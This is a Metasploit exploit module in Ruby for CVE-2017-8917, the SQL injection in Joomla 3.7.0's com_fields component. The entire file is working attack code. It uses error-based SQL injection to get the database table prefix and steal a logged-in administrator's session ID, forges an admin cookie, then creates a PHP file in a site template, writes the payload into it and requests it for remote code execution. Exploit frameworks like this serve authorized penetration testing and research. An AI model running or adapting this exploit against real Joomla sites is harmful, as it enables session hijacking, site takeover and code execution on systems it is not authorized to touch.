1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11
  include Msf::Exploit::Remote::HTTP::Joomla
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
18
        'Description' => %q{
19
          This module exploits a SQL injection vulnerability in the com_fields
20
          component, which was introduced to the core of Joomla in version 3.7.0.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [
24
          'Mateus Lino', # Vulnerability discovery
25
          'luisco100 <luisco100[at]gmail.com>' # Metasploit module
26
        ],
27
        'References' => [
28
          [ 'CVE', '2017-8917' ], # SQLi
29
          [ 'EDB', '42033' ],
30
          [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
31
        ],
32
        'Payload' => {
33
          'DisableNops' => true,
34
          # Arbitrary big number. The payload gets sent as POST data, so
35
          # really it's unlimited
36
          'Space' => 262144, # 256k
37
        },
38
        'Platform' => ['php'],
39
        'Arch' => ARCH_PHP,
40
        'Targets' => [
41
          [ 'Joomla 3.7.0', {} ]
42
        ],
43
        'Privileged' => false,
44
        'DisclosureDate' => '2017-05-17',
45
        'DefaultTarget' => 0,
46
        'Notes' => {
47
          'Reliability' => UNKNOWN_RELIABILITY,
48
          'Stability' => UNKNOWN_STABILITY,
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
        }
51
      )
52
    )
53
  end
54

55
  def check
56
    # Request using a non-existing table
57
    val = sqli(rand_text_alphanumeric(rand(10) + 6), 'check')
58

59
    if val.nil?
60
      return Exploit::CheckCode::Safe
61
    else
62
      return Exploit::CheckCode::Vulnerable
63
    end
64
  end
65

66
  def sqli(tableprefix, option)
67
    # SQLi will grab Super User or Administrator sessions with a valid username and userid (else they are not logged in).
68
    # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
69
    # This way we make sure that's excluded and we only get real Administrator or Super User sessions.
70
    if option == 'check'
71
      start = rand_text_alpha(5)
72
      start_h = start.unpack('H*')[0]
73
      fin = rand_text_alpha(5)
74
      fin_h = fin.unpack('H*')[0]
75

76
      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x#{fin_h}),4879))"
77
    else
78
      start = rand_text_alpha(3)
79
      start_h = start.unpack('H*')[0]
80
      fin = rand_text_alpha(3)
81
      fin_h = fin.unpack('H*')[0]
82

83
      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x#{fin_h}),4879))"
84
    end
85

86
    # Retrieve cookies
87
    res = send_request_cgi({
88
      'method' => 'GET',
89
      'uri' => normalize_uri(target_uri.path, 'index.php'),
90
      'vars_get' => {
91
        'option' => 'com_fields',
92
        'view' => 'fields',
93
        'layout' => 'modal',
94
        'list[fullordering]' => sql
95
      }
96
    })
97

98
    if res && res.code == 500 && res.body =~ /#{start}(.*)#{fin}/
99
      return $1
100
    end
101

102
    return nil
103
  end
104

105
  def exploit
106
    # Request using a non-existing table first, to retrieve the table prefix
107
    val = sqli(rand_text_alphanumeric(rand(10) + 6), 'check')
108
    if val.nil?
109
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
110
    else
111
      table_prefix = Base64.decode64(val)
112
      table_prefix.sub! '_session', ''
113
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
114
    end
115

116
    # Retrieve the admin session using our retrieved table prefix
117
    val = sqli("#{table_prefix}_", 'exploit')
118
    if val.nil?
119
      fail_with(Failure::Unknown, "#{peer}: No logged-in Administrator or Super User user found!")
120
    else
121
      auth_cookie_part = val
122
      print_status("#{peer} - Retrieved cookie [ #{auth_cookie_part} ]")
123
    end
124

125
    # Retrieve cookies
126
    res = send_request_cgi({
127
      'method' => 'GET',
128
      'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php')
129
    })
130

131
    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
132
      cookie_begin = $1
133
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
134
    else
135
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
136
    end
137

138
    # Modify cookie to authenticated admin
139
    auth_cookie = cookie_begin
140
    auth_cookie << '='
141
    auth_cookie << auth_cookie_part
142
    auth_cookie << ';'
143

144
    # Authenticated session
145
    res = send_request_cgi({
146
      'method' => 'GET',
147
      'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
148
      'cookie' => auth_cookie
149
    })
150

151
    if res && res.code == 200 && res.body =~ /Control Panel -(.*?)- Administration/
152
      print_good("#{peer} - Successfully authenticated")
153
    else
154
      fail_with(Failure::Unknown, "#{peer} - Session failure")
155
    end
156

157
    # Retrieve template view
158
    res = send_request_cgi({
159
      'method' => 'GET',
160
      'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
161
      'cookie' => auth_cookie,
162
      'vars_get' => {
163
        'option' => 'com_templates',
164
        'view' => 'templates'
165
      }
166
    })
167

168
    # We try to retrieve and store the first template found
169
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&amp;view=template&amp;id=([0-9]+)&amp;file=([a-zA-Z0-9=]+)/
170
      template_id = $1
171
      file_id = $2
172

173
      form = res.body.split(/<form action=([^\>]+) method="post" name="adminForm" id="adminForm"\>(.*)<\/form>/mi)
174
      input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
175
      input_id = input_hidden[7].split("\"")
176
      input_id = input_id[1]
177

178
    else
179
      fail_with(Failure::Unknown, "Unable to retrieve template")
180
    end
181

182
    filename = rand_text_alphanumeric(rand(10) + 6)
183
    # Create file
184
    print_status("#{peer} - Creating file [ #{filename}.php ]")
185
    res = send_request_cgi({
186
      'method' => 'POST',
187
      'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
188
      'cookie' => auth_cookie,
189
      'vars_get' => {
190
        'option' => 'com_templates',
191
        'task' => 'template.createFile',
192
        'id' => template_id,
193
        'file' => file_id,
194
      },
195
      'vars_post' => {
196
        'type' => 'php',
197
        'address' => '',
198
        input_id => '1',
199
        'name' => filename
200
      }
201
    })
202

203
    # Grab token
204
    if res && res.code == 303 && res.headers['Location']
205
      location = res.headers['Location']
206
      print_status("#{peer} - Following redirect to [ #{location} ]")
207
      res = send_request_cgi(
208
        'uri' => location,
209
        'method' => 'GET',
210
        'cookie' => auth_cookie
211
      )
212

213
      # Retrieving template token
214
      if res && res.code == 200 && res.body =~ /&amp;([a-z0-9]+)=1\">/
215
        token = $1
216
        print_status("#{peer} - Token [ #{token} ] retrieved")
217
      else
218
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
219
      end
220

221
      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
222
        template_path = $1
223
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
224
      else
225
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
226
      end
227

228
    else
229
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
230
    end
231

232
    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
233

234
    # Inject payload data into file
235
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
236
    res = send_request_cgi({
237
      'method' => 'POST',
238
      'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
239
      'cookie' => auth_cookie,
240
      'vars_get' => {
241
        'option' => 'com_templates',
242
        'view' => 'template',
243
        'id' => template_id,
244
        'file' => filename_base64,
245
      },
246
      'vars_post' => {
247
        'jform[source]' => payload.encoded,
248
        'task' => 'template.apply',
249
        token => '1',
250
        'jform[extension_id]' => template_id,
251
        'jform[filename]' => "/#{filename}.php"
252
      }
253
    })
254

255
    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
256
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
257
    else
258
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
259
    end
260

261
    # Request payload
262
    register_files_for_cleanup("#{filename}.php")
263
    print_status("#{peer} - Executing payload")
264
    res = send_request_cgi({
265
      'method' => 'POST',
266
      'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
267
      'cookie' => auth_cookie
268
    })
269
  end
270
end
271

272